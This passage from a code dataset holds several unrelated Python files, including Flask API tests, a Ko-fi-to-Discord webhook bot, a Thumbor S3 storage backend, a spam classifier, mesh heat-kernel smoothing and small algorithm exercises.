but user only belongs to one group\n assert (\n client.post(\n \"/api/_bulk\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 200\n )\n login_as(\"user_b\")\n # Test no permission groups\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 404\n )\n login_as(\"user_a\")\n # Test multiple permission groups, none specified\n assert (\n client.post(\n \"/api/_bulk\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 400\n )\n\n # Test multiple permission groups, one specified\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 200\n )\n\n\ndef test_bulk_multiple_csv(test_database, client, login_as):\n login_as(\"admin\")\n\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n data=\"\"\"\nfamily_codename,participant_codename,participant_type,tissue_sample_type,dataset_type,sex,condition,sequencing_date,linked_files,notes\nHOOD,HERO,Proband,Saliva,WGS,Female,GermLine,2020-12-17,/path/foo|/path/bar||,\nHOOD,HERO,Proband,Saliva,WGS,Female,GermLine,2020-12-17,/path/yeet|/path/cross|/foo/bar,three\n\"\"\",\n headers={\"Content-Type\": \"text/csv\"},\n ).status_code\n == 200\n )\n\n for dataset in models.Dataset.query.all():\n print(dataset)\n assert models.Dataset.query.count() == 6\n assert models.DatasetFile.query.count() == 5\n assert models.TissueSample.query.count() == 5\n assert models.Participant.query.count() == 4\n assert models.Family.query.count() == 3\n\n\ndef test_bulk_multiple_json(test_database, client, login_as):\n login_as(\"admin\")\n\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"HOOD\",\n \"participant_codename\": \"HERO\",\n \"participant_type\": \"Proband\",\n \"tissue_sample_type\": \"Saliva\",\n \"dataset_type\": \"WGS\",\n \"sex\": \"Female\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n \"linked_files\": [\"/otonashi/yuzuru\", \"/tachibana/kanade\"],\n },\n {\n \"family_codename\": \"HOOD\",\n \"participant_codename\": \"HERO\",\n \"participant_type\": \"Proband\",\n \"tissue_sample_type\": \"Saliva\",\n \"dataset_type\": \"WES\",\n \"sex\": \"Female\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n \"linked_files\": [\n \"\",\n \"/perfectly/balanced\",\n \"/as/all/things/should/be\",\n ],\n },\n ],\n ).status_code\n == 200\n )\n\n assert models.Dataset.query.count() == 6\n assert models.DatasetFile.query.count() == 4\n assert models.TissueSample.query.count() == 5\n assert models.Participant.query.count() == 4\n assert models.Family.query.count() == 3\n","sub_path":"flask/tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":13597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"46692707","text":"import traceback\nimport json\nimport util_functions\nfrom discord.ext import commands\nimport discord\nimport sys\nimport re\nimport os\nimport asyncio\nfrom aiohttp import web\nimport datetime\n\nbotToken = os.environ.get('botToken')\n\ndef run_app(app, *, host='0.0.0.0', port=80, shutdown_timeout=60.0, ssl_context=None, print=print, backlog=128):\n \"\"\"Run an app\"\"\"\n if port is None:\n if not ssl_context:\n port = 8080\n else:\n port = 8443\n\n loop = app.loop\n\n handler = app.make_handler()\n server = loop.create_server(handler, host, port, ssl=ssl_context, backlog=backlog)\n srv, startup_res = loop.run_until_complete(asyncio.gather(server, app.startup(), loop=loop))\n\n scheme = 'https' if ssl_context else 'http'\n print(\"======== Running on {scheme}://{host}:{port}/ ========\\n\"\n \"(Press CTRL+C to quit)\".format(\n scheme=scheme, host=host, port=port))\n\nasync def tba_handler(request):\n data = await request.post()\n data = json.loads(data['data'])\n print(\"Accepted request:\\n{}\".format(data))\n print(\"{}\".format(data))\n embed = discord.Embed(\n title=\"Ko-Fi Received!\", \n url=\"https://ko-fi.com/eylesis\", \n description=\"{} has sent ${}.\".format(data['from_name'], data['amount']))\n embed.set_footer(text=\"Ko-Fi Notification\")\n \n if data['message'] == \"\":\n data['message'] == \"No Message.\"\n embed.add_field(name=\"__Message__\", value=data['message'])\n\n channelids = {'470455397912674305'}\n for channelid in channelids:\n await bot.send_message(bot.get_channel(channelid), embed=embed)\n return web.Response()\n \n\nbot = commands.Bot(command_prefix='*')\nloop = bot.loop\napp = web.Application(loop=loop)\napp.router.add_post('/endpoint', tba_handler)\n\n\n\n\nif __name__ == \"__main__\":\n run_app(app, host=os.environ.get('HOST'), port=os.environ.get('PORT'))\n bot.run(botToken)","sub_path":"KofiFriend_Brain.py","file_name":"KofiFriend_Brain.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"648574208","text":"import matplotlib\nmatplotlib.use(\"Qt5Agg\")\nfrom multiprocessing import freeze_support\nfrom common.dummyStream import test_stdout\nfrom PyQt5.QtWidgets import QApplication\nfrom forms.main_form import MainWindow\nfrom common import routines\nimport argparse\nimport sys\nimport os\n\ndef update_data(data_dir, athletes_db):\n data_dir = routines.process_path(data_dir)\n for athlete_dir in os.listdir(data_dir):\n if not os.path.isdir(data_dir + athlete_dir):\n continue\n athletes_db.update_athlete_info(athlete_dir, routines.process_path(data_dir + athlete_dir))\n\n\nif __name__ == '__main__':\n test_stdout()\n freeze_support()\n os.chdir(os.path.abspath(os.path.dirname(sys.argv[0])))\n routines.set_env_variable('FITDUMP_ROOT', routines.process_path(os.path.abspath(os.curdir)))\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_dir', dest='data_dir', action='store',\n default=os.path.abspath(os.curdir) + '/test_data', help='directory with data files')\n parser.add_argument('--db', dest='db', action='store', default='db.sqlite3',\n help='Directory with installing packages')\n parser.add_argument(dest='command', action='store', help='not used', nargs='*')\n args = parser.parse_args()\n\n app = QApplication(sys.argv)\n main_windows = MainWindow(args.data_dir, args.db)\n main_windows.show()\n sys.exit(app.exec_())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"203298629","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport datetime\nimport logging\nimport requests\nimport configparser\n\ndef main():\n \"\"\"\n Main funtion to run the code.\n \"\"\"\n # set up log file\n logging.basicConfig(filename='exchange_rate_info.log', format='%(asctime)s %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')\n print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Checking config file.\".format(datetime.datetime.now()))\n # check existence of config file\n (url, access_key) = read_config()\n if (url == 'None' or access_key == 'None'):\n print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Warning : Config file not found or not set up correctly. Please ensure a config file is set up with required connection parameters.\".format(datetime.datetime.now()))\n sys.exit(0)\n # HTTPS Header\n headers = {'Content-Type': 'application/json'}\n # log progress\n print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Retreiving latest data.\".format(datetime.datetime.now()))\n # get the latest exchange rates from fixer.io in JSON format\n rate_info = get_response(get_url(url, access_key), headers)\n\n if rate_info is not None:\n if (not rate_info['success']):\n print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Error : {1}\".format(datetime.datetime.now(), rate_info['error']['info']))\n #print (rate_info['error']['info'])\n else:\n # log progress\n print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Displaying Currency Rates.\".format(datetime.datetime.now()))\n display_rates(rate_info)\n else:\n print('[!] Request Failed')\n\ndef get_url(api_url_base, api_access_key):\n \"\"\"\n Gets the full Web API url.\n \"\"\"\n # Fixer.io format\n api_format = '1'\n # Fixer.io base currency\n api_base_currency = 'AUD'\n\n return (api_url_base.format(api_access_key, api_format))\n\ndef get_response(address, header):\n \"\"\"\n Gets the JSON data from the Web API.\n \"\"\" \n # REST Web API URL\n api_url = address\n # JSON response\n response = requests.get(api_url, headers=header)\n # HTTP response check\n if response.status_code == 200:\n return json.loads(response.content.decode('utf-8'))\n else:\n return None\n\ndef read_config():\n \"\"\"\n Reads the data source settings from the config file.\n \"\"\"\n config = configparser.ConfigParser()\n try:\n config.read('config.ini')\n except Exception as e:\n logging.error(e)\n print (\"No config file found!\")\n sys.exit(0)\n else:\n base_url = config.get('DEFAULT', 'url', fallback='None')\n access_key = config.get('DEFAULT', 'key', fallback='None')\n\n return (base_url, access_key)\n\ndef display_rates(exchange_rates):\n \"\"\"\n Displays the currency rates. \n \"\"\"\n base_AUD_rate = 1\n\n for k,v in exchange_rates['rates'].items():\n if k == 'AUD':\n base_AUD_rate = v\n\n for k,v in exchange_rates['rates'].items():\n currency_code = k\n currency_rate = round(v / base_AUD_rate, 2)\n print ('[{0:%d/%m/%Y %I:%M:%S %p}] 1 AUD = {1} {2}'.format(datetime.datetime.now(), currency_rate, currency_code)) \n\n# Standard boilerplate to call the main() function to begin\n# the program.\nif __name__ == '__main__':\n main()","sub_path":"Exchange Rate Info/exchange-rate-info.py","file_name":"exchange-rate-info.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"139419781","text":"import MeCab\nimport random\n\n#形態素解析\ndef MorphologicalAnalysis(text):\n mecab = MeCab.Tagger(\"-Ochasen\")\n mecab.parse('')#文字列がGCされるのを防ぐ\n node = mecab.parseToNode(text)\n sentence = []\n sentence_pos = []\n\n while node:\n #単語を取得\n word = node.surface\n #品詞を取得\n pos = node.feature.split(\",\")[0]\n sentence.append(word)\n sentence_pos.append(pos)\n #次の単語に進める\n node = node.next\n\n sentence.pop(0)\n sentence.pop(-1)\n sentence_pos.pop(0)\n sentence_pos.pop(-1)\n return sentence, sentence_pos\n\n\ndef PhraseMorphologicalAnalysis(phrase):\n mecab = MeCab.Tagger(\"-Ochasen\")\n mecab.parse('')#文字列がGCされるのを防ぐ\n node = mecab.parseToNode(phrase)\n sentence_pos = []\n\n while node:\n #単語を取得\n word = node.surface\n #品詞を取得\n pos = node.feature.split(\",\")[0]\n sentence_pos.append(pos)\n #次の単語に進める\n node = node.next\n\n sentence_pos.pop(0)\n sentence_pos.pop(-1)\n return sentence_pos\n\n\n#ngrams\ndef Ngrams(n, text):\n sentence, sentence_pos = MorphologicalAnalysis(text)\n ngrams_list = []\n ngrams_pos = []\n for i in range(len(sentence)-n+1):\n ngrams_list.append(sentence[i:i+n])\n ngrams_pos.append(sentence_pos[i:i+n])\n\n return ngrams_list, ngrams_pos\n\n\ndef MakingDocument(n, text):\n sentence, sentence_pos = Ngrams(n, text)\n i = 0\n index = 0\n next_phrase = \"\"\n makingSentence = []\n candidate = []\n while i <= 3:\n\n if len(makingSentence) == 0:\n for sen, sen_pos in zip(sentence, sentence_pos):\n if sen_pos[0] == \"名詞\":\n candidate.append(sen)\n \n index = random.randrange(0, len(candidate))\n next_phrase = candidate[index][0]\n makingSentence.append(next_phrase)\n candidate.clear()\n continue\n\n \n if next_phrase == \"の\":\n for sen, sen_pos in zip(sentence, sentence_pos):\n if sen_pos[0] != \"動詞\" or sen_pos[0] != \"助詞\" or sen_pos[0] != \"助動詞\" or sen_pos[0] != \"記号\":\n candidate.append(sen)\n \n index = random.randrange(0, len(candidate))\n next_phrase = candidate[index][0]\n makingSentence.append(next_phrase)\n candidate.clear()\n continue\n\n\n if next_phrase == \".\" or next_phrase == \",\":\n for sen, sen_pos in zip(sentence, sentence_pos):\n if sen_pos[0] == \"名詞\":\n candidate.append(sen)\n \n if next_phrase == \".\":\n i += 1\n if i == 3:\n break\n\n index = random.randrange(0, len(candidate))\n next_phrase = candidate[index][0]\n makingSentence.append(next_phrase)\n candidate.clear()\n continue\n\n \n if PhraseMorphologicalAnalysis(makingSentence[-1]) == \"助動詞\":\n makingSentence.append(\".\")\n \n\n index = random.randrange(0, len(sentence))\n next_phrase = sentence[index][0]\n while next_phrase == makingSentence[-1][0] or sentence_pos[index][0] == PhraseMorphologicalAnalysis(makingSentence[-1]):\n index = random.randrange(0, len(sentence))\n next_phrase = sentence[index][0]\n\n makingSentence.append(next_phrase)\n\n\n\n makingSentence = \"\".join(makingSentence)\n print(makingSentence)\n\n\n\nf = open(\"sentence_data.txt\", \"r\", encoding=\"utf-8\")\ndataList = f.readlines()\nfor i in range(len(dataList)):\n sen = dataList[i].strip()\n dataList[i] = sen\n \ntext2 = \"\".join(dataList)\nsentences2, sentence_pos2 = Ngrams(3, text2)\n\nMakingDocument(3, text2)\n#print(sentences2)\n#print(sentence_pos2)\n\nf.close()\n","sub_path":"sentence.py","file_name":"sentence.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"621044563","text":"#coding: utf-8\n\n# Copyright (c) 2015-2016, thumbor-community\n# Use of this source code is governed by the MIT license that can be\n# found in the LICENSE file.\nfrom os.path import splitext\n\nfrom json import dumps, loads\n\nfrom botocore.exceptions import BotoCoreError, ClientError\n\nfrom thumbor.storages import BaseStorage\nfrom thumbor.utils import logger\n\nfrom ..aws.storage import AwsStorage\n\nclass Storage(AwsStorage, BaseStorage):\n \"\"\"\n S3 Storage\n \"\"\"\n def __init__(self, context):\n \"\"\"\n Constructor\n :param Context context: Thumbor's context\n \"\"\"\n BaseStorage.__init__(self, context)\n AwsStorage.__init__(self, context, 'TC_AWS_STORAGE')\n self.storage_expiration_seconds = context.config.get('STORAGE_EXPIRATION_SECONDS', 3600)\n\n\n async def put(self, path, file_bytes):\n \"\"\"\n Stores image\n :param string path: Path to store data at\n :param bytes bytes: Data to store\n :rtype: string\n \"\"\"\n try:\n await self._put_object(file_bytes, self._normalize_path(path))\n except BotoCoreError as err:\n logger.exception('Unable to store object: %s', err)\n return None\n\n return path\n\n async def put_crypto(self, path):\n \"\"\"\n Stores crypto data at given path\n :param string path: Path to store the data at\n :return: Path where the crypto data is stored\n \"\"\"\n if not self.context.config.STORES_CRYPTO_KEY_FOR_EACH_IMAGE:\n return\n\n if not self.context.server.security_key:\n raise RuntimeError(\n \"STORES_CRYPTO_KEY_FOR_EACH_IMAGE can't be \"\n \"True if no SECURITY_KEY specified\"\n )\n\n file_abspath = self._normalize_path(path)\n crypto_path = '%s.txt' % splitext(file_abspath)[0]\n\n try:\n await self._put_object(self.context.server.security_key.encode('utf-8'), crypto_path)\n except BotoCoreError as err:\n logger.exception('Unable to store crypto object: %s', err)\n return None\n\n logger.debug(\n \"Stored crypto at %s (security key: %s)\",\n crypto_path,\n self.context.server.security_key,\n )\n\n return file_abspath\n\n async def put_detector_data(self, path, data):\n \"\"\"\n Stores detector data at given path\n :param string path: Path to store the data at\n :param string data: Data to store\n :return: Path where the data is stored\n :rtype: string\n \"\"\"\n file_abspath = self._normalize_path(path)\n\n path = '%s.detectors.txt' % splitext(file_abspath)[0]\n\n try:\n await self._put_object(dumps(data).encode('utf-8'), path)\n except BotoCoreError as err:\n logger.exception('Unable to store detector data: %s', err)\n return None\n\n return file_abspath\n\n async def get_crypto(self, path):\n \"\"\"\n Retrieves crypto data at path\n :param string path: Path to search for crypto data\n \"\"\"\n file_abspath = self._normalize_path(path)\n crypto_path = \"%s.txt\" % (splitext(file_abspath)[0])\n\n try:\n file_key = await self.storage.get(crypto_path)\n except ClientError as err:\n logger.warn(\"[STORAGE] s3 key not found at %s\" % crypto_path)\n return None\n\n async with file_key['Body'] as stream:\n file_key = await stream.read()\n\n return file_key.decode('utf-8')\n\n async def get_detector_data(self, path):\n \"\"\"\n Retrieves detector data from storage\n :param string path: Path where the data is stored\n \"\"\"\n file_abspath = self._normalize_path(path)\n path = '%s.detectors.txt' % splitext(file_abspath)[0]\n\n try:\n file_key = await self.storage.get(path)\n except ClientError:\n return None\n\n if not file_key or self.is_expired(file_key) or 'Body' not in file_key:\n return None\n\n async with file_key['Body'] as stream:\n return loads(await stream.read())\n\n async def get(self, path):\n \"\"\"\n Gets data at path\n :param string path: Path for data\n \"\"\"\n\n try:\n file = await super(Storage, self).get(path)\n except BotoCoreError:\n return None\n\n async with file['Body'] as stream:\n return await stream.read()\n\n async def exists(self, path):\n \"\"\"\n Tells if data exists at given path\n :param string path: Path to check\n \"\"\"\n file_abspath = self._normalize_path(path)\n return await self.storage.exists(file_abspath)\n\n async def remove(self, path):\n \"\"\"\n Deletes data at path\n :param string path: Path to delete\n \"\"\"\n return await self.storage.delete(self._normalize_path(path))\n\n","sub_path":"tc_aws/storages/s3_storage.py","file_name":"s3_storage.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"220272798","text":"import math\n\ndef counterGame(n, t):\n # Caso base\n if n == 1:\n return t\n # Es potencia de 2\n elif (n & (n-1) == 0):\n return counterGame(int(n >> 1), t + 1)\n # No es potencia\n else:\n bit = -2\n lg = n\n while lg:\n lg >>= 1\n bit += 1\n return counterGame(n - int(2 << bit), t + 1)\n\nnums = []\nfor i in range(int(input())):\n nums.append(int(input()))\n\n# Por cada juego\nfor n in nums:\n if counterGame(n,0) & 1:\n print(\"Louise\")\n else:\n print(\"Richard\")\n","sub_path":"Algoritmia/Contest2/CounterGame.py","file_name":"CounterGame.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"332464652","text":"def heat_kernel_smoothing(vtx, fac, data, adjm, sigma, n_smooth):\n \"\"\"\n This function performs heat kernel smoothing [1,2,3] on a triangle mesh. The code is mainly \n adapted from the matlab code by Chung et al. (http://pages.stat.wisc.edu/~mchung/softwares/hk/\n hk_smooth.m). The kernel bandwidth corresponds to diffusion time in the heat equation [3]. The\n FWHM follows 4*sqrt(log 2*n_smooth*sigma) with the natural log.\n \n If you use this code, please reference one of the following papers. The details on the \n mathematical basis of of the algorithm can be found in these papers.\n \n [1] Chung, M.K., Robbins,S., Dalton, K.M., Davidson, Alexander, A.L., R.J., Evans, A.C. 2005. \n Cortical thickness analysis in autism via heat kernel smoothing. NeuroImage 25:1256-1265 \n http://www.stat.wisc.edu/~mchung/papers/ni_heatkernel.pdf\n\n [2] Chung, M.K., Robbins, S., Evans, A.C. 2005. Unified statistical approach to cortical \n thickness analysis. Information Processing in Medical Imaging (IPMI). Lecture Notes in Computer \n Science (LNCS) 3565:627-638. Springer-Verlag \n http://www.stat.wisc.edu/~mchung/papers/IPMI/hk.IPMI.2005.pdf\n\n [3] Chung, M.K. Hartley, R., Dalton, K.M., Davidson, R.J. 2008. Encoding cortical surface by \n spherical harmonics. Satistica Sinica 18:1269-1291 \n http://www.stat.wisc.edu/%7Emchung/papers/sinica.2008.pdf\n \n Inputs:\n *vtx: vertex points or surface mesh.\n *fac: faces of surface mesh.\n *data: array of vertex-wise sampled data points.\n *adjm: adjacency matrix.\n *sigma: kernel bandwidth.\n *n_smooth: number of iterations.\n Outputs:\n *res: array of vertex-wise smoothed data points.\n \n created by Daniel Haenelt\n Date created: 04-03-2020\n Last modified: 04-03-2020\n \"\"\"\n import numpy as np\n from lib_gbb.neighbor.nn_2d import nn_2d\n\n # number of vertices\n n_vertex = len(vtx)\n\n # heat kernel shape\n K = lambda x, sigma : np.exp(-x/(4*sigma))/np.sum(np.exp(-x/(4*sigma)))\n \n # get max degree (number of first order neighbors)\n max_degree = 0\n for i in range(n_vertex):\n nn = nn_2d(i, adjm, 0)\n degree = len(nn)\n if degree > max_degree:\n max_degree = degree\n \n # heat kernel weight computation\n neighbor = np.zeros((n_vertex, max_degree+1)).astype(int) # including the current vertex\n weight = np.zeros((n_vertex, max_degree+1)) # including the current vertex\n for i in range(n_vertex):\n \n # get vertex neighbors\n nn = nn_2d(i, adjm, 0)\n degree = len(nn)\n\n # get distance to vertex neighbors\n distance = 0\n for j in range(degree):\n distance = np.append(distance, np.sum(( vtx[nn[j]] - vtx[i,:] ) ** 2))\n \n # get heat kernel weighting for each neighbor\n weight[i,:1+degree] = K(distance, sigma)\n \n # get corresponding neighbor (add 1 because of dummy row)\n neighbor[i,:1+degree] = np.append([i],nn) + 1 \n\n # add dummy row\n data = np.append(1, data)\n \n # iterative kernel smoothing\n for i in range(n_smooth):\n \n # add weights\n res = np.zeros_like(data)\n for j in range(max_degree):\n res[1:] += data[neighbor[:,j]] * weight[:,j]\n \n # initialize new data array\n data = res.copy()\n \n # remove dummy row \n res = res[1:]\n \n return res","sub_path":"lib/surface/heat_kernel_smoothing.py","file_name":"heat_kernel_smoothing.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"402511221","text":"'''Given a word w, rearrange the letters of w to construct another word s in such a way that s is lexicographically greater \nthan w. In case of multiple possible answers, find the lexicographically smallest one among them.'''\n\n\nfor x in range(int(input().strip())):\n s = input().strip()\n x = len(s) - 1\n while(x > 0 and s[x] <= s[x - 1]):\n x -= 1\n \n if(x == 0):\n print(\"no answer\")\n continue\n \n j = len(s) - 1\n while(j > x - 1 and s[j] <= s[x - 1]):\n j -= 1\n \n s = list(s)\n s[x - 1], s[j] = s[j], s[x - 1]\n print(''.join(s[:x]) + ''.join(list(reversed(s[x:]))))\n","sub_path":"Bigger is Greater.py","file_name":"Bigger is Greater.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"27274325","text":"# Copyright (c) 2016-2022 Association of Universities for Research in Astronomy, Inc. (AURA)\n# For license information see LICENSE or https://opensource.org/licenses/BSD-3-Clause\n\nfrom datetime import date\n\nfrom lucupy.minimodel import Site\n\nfrom scheduler.services.resource import OcsResourceService\n\n# For Bryan and Kristin: testing instructions\nif __name__ == '__main__':\n # To get the Resources for a specific site on a specific local date, modify the following.\n site = Site.GN\n day = date(year=2018, month=11, day=8)\n\n resources_available = OcsResourceService().get_resources(site, day)\n\n print(f'*** Resources for site {site.name} for {day} ***')\n for resource in sorted(resources_available, key=lambda x: x.id):\n print(resource)\n","sub_path":"scheduler/scripts/get_resources.py","file_name":"get_resources.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"119438733","text":"import math\nimport random\nimport pickle\nimport numpy as np\nimport sys\nfrom scipy import spatial\n\n\n# lang = sys.argv[1]\n# w = float(sys.argv[2])\nlang = 'fr_en'\nw = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9] #\n\nclass EAstrategy:\n seeds = []\n linkEmbedding=[]\n kg1E=[]\n kg2E=[]\n EA_results={}\n\n def read_EA_list(self,EAfile):\n # with open(EAfile,'r',encoding='utf-8') as r:\n # lines=r.readlines()\n # for line in lines:\n # line=line.strip()\n # e1, e2=line.split()\n # if e1 in self.seeds_map:\n # print('error,',e1)\n # else:\n # self.seeds_map[e1]=e2\n\n ret = []\n with open(EAfile, encoding='utf-8') as f:\n for line in f:\n th = line[:-1].split('\\t')\n x = []\n for i in range(2):\n x.append(int(th[i]))\n ret.append(tuple(x))\n self.seeds = ret[int(len(ret)*0.3):]\n\n def read_KG1_and_KG2_list(self,kg1file,kg2file):\n with open(kg1file,'r',encoding='utf-8') as r:\n kg1lines=r.readlines()\n with open(kg2file,'r',encoding='utf-8') as r:\n kg2lines=r.readlines()\n for line in kg1lines:\n line=line.strip()\n self.kg1E.append(line.split()[0])\n for line in kg2lines:\n line = line.strip()\n self.kg2E.append(line.split()[0])\n\n def XRR(self, RTEembeddingfile):\n RTElines = pickle.load(open(RTEembeddingfile, 'rb'), encoding='utf-8')\n entlength = len(RTElines)\n for i in range(entlength):\n rline = RTElines[i]\n rline_list = rline.tolist()\n self.linkEmbedding.append(rline_list)\n\n def XRA(self, ATEembeddingfile):\n with open(ATEembeddingfile, 'r', encoding='utf-8') as r:\n ATElines = r.readlines()\n entlength = len(ATElines)\n for i in range(entlength):\n aline = ATElines[i].strip()\n aline_list = aline.split()\n self.linkEmbedding.append(aline_list)\n\n def EAlinkstrategy(self,RTEembeddingfile,ATEembeddingfile):\n RTElines=pickle.load(open(RTEembeddingfile,'rb'),encoding='utf-8')\n with open(ATEembeddingfile,'r',encoding='utf-8') as r:\n ATElines=r.readlines()\n entlength=len(ATElines)\n for i in range(entlength): #list连接操作\n rline=RTElines[i]\n rline_list=rline.tolist()\n aline=ATElines[i].strip()\n aline_list=aline.split()\n self.linkEmbedding.append(rline_list+aline_list)\n\n def EAlinkstrategy_weight(self,RTEembeddingfile,ATEembeddingfile, w):\n RTElines=pickle.load(open(RTEembeddingfile,'rb'),encoding='utf-8')\n with open(ATEembeddingfile,'r',encoding='utf-8') as r:\n ATElines=r.readlines()\n entlength=len(ATElines)\n for i in range(entlength): #分配权重操作\n rline=RTElines[i]\n rline_list=rline.tolist()\n rline_list_w = [float(j) * float(w) for j in rline_list]\n aline=ATElines[i].strip()\n aline_list=aline.split()\n aline_list_w = [float(j) * float(1-w) for j in aline_list]\n add_weight = list(map(lambda x:x[0]+x[1], zip(rline_list_w, aline_list_w)))\n self.linkEmbedding.append(add_weight)\n print('complete weighting')\n\n def EAlinkstrategy_iteration(self, RTEembeddingfile):\n RTElines = pickle.load(open(RTEembeddingfile, 'rb'), encoding='utf-8')\n self.linkEmbedding = RTElines\n # def distance(self,yuzhi):\n # count = 0\n # for i in self.kg1E:\n # count += 1\n # align_id_list={} #id:juli\n # for j in self.kg2E:\n # dimension=len(self.linkEmbedding[int(j)])\n # now_dis=0\n # for k in range(dimension):\n # now_dis+=abs(float(self.linkEmbedding[int(i)][k])-float(self.linkEmbedding[int(j)][k])) #L1正则化计算\n # if now_dis p_ham:\n return 'spam'\n else:\n return 'ham'\n\n\nif __name__ == '__main__':\n global test_ham_count\n global test_spam_count\n print('Start read data')\n before_read = time.time()\n\n raw_data = pd.read_csv('email_data.csv', header=0)\n\n end_read = time.time()\n print('Finished read data')\n print('Reading email costs %ss' % (end_read - before_read))\n data = raw_data.values\n emails = data[:2000, 1::]\n label = data[:2000, 0]\n\n print('Start parse')\n data_set = parse_email_content(emails)\n print('Finished parse')\n\n print('Start statistical words ')\n before_start = time.time()\n spam_dict, ham_dict, total_spam, total_ham, p_spam_email = statistical_words(data_set, label)\n after_start = time.time()\n print('train cost:%ss' % (after_start - before_start))\n\n # words = raw_input('Please input words:\\n')\n\n print('Calculate correct rate...')\n test_emails = data[2000:2500, 1::]\n test_label = data[2000:2500, 0]\n index = 0\n\n I, J, K, L = (0, 0, 0, 0)\n before_start = time.time()\n for test_email in test_emails:\n words = str(test_email[0]).split(',')\n result = classify_by_words(words, spam_dict, ham_dict, total_spam, total_ham, p_spam_email)\n correct_label = test_label[index]\n if correct_label == 'ham':\n test_ham_count += 1\n if result == correct_label:\n I += 1\n else:\n J += 1\n else:\n test_spam_count += 1\n if result == correct_label:\n L += 1\n else:\n K += 1\n index += 1\n\n print('I: %s, J: %s, K: %s, L: %s' % (I, J, K, L))\n\n print('correct rate: %s' % ((float(L + I) / (I + J + K + L))))\n print('ham email correct rate: %s' % (float(I) / (K + I)))\n print('spam email correct rate: %s' % (float(L) / (L + J)))\n print('ham email return rate: %s' % (float(I) / (I + J)))\n print('spam email return rate: %s' % (float(L) / (L + K)))\n\n after_start = time.time()\n print('Test Cost:%ss' % (after_start - before_start))\n\n print('train_spam_count: %s, train_ham_count: %s, test_spam_count: %s, test_ham_count: %s' % (\n train_spam_count, train_ham_count, test_spam_count, test_ham_count))\n","sub_path":"new_email_classify.py","file_name":"new_email_classify.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"178700646","text":"\ndef mergeSort(array):\n print(\"Dividiendo \",array)\n if len(array)>1:\n mitad = len(array)//2\n izq = array[:mitad]\n der = array[mitad:]\n mergeSort(izq)\n mergeSort(der)\n i=0\n j=0\n k=0\n while i < len(izq) and j < len(der):\n if izq[i] < der[j]:\n array[k]=izq[i]\n i=i+1\n else:\n array[k]=der[j]\n j=j+1\n k=k+1\n while i < len(izq):\n array[k]=izq[i]\n i=i+1\n k=k+1\n while j < len(der):\n array[k]=der[j]\n j=j+1\n k=k+1\n print(\"Merging \",array)\narray = [54,26,93,17,77,31,44,55,20]\nmergeSort(array)\nprint(array)\n","sub_path":"Clase-4/mergsort.py","file_name":"mergsort.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"609268042","text":"class Sku:\n def __init__(self, sku, price, storage, shipping_fee, style_color, style_size, image_url,\n extra_image_list, weight=300):\n self.sku = sku\n self.price = price\n self.storage = storage\n 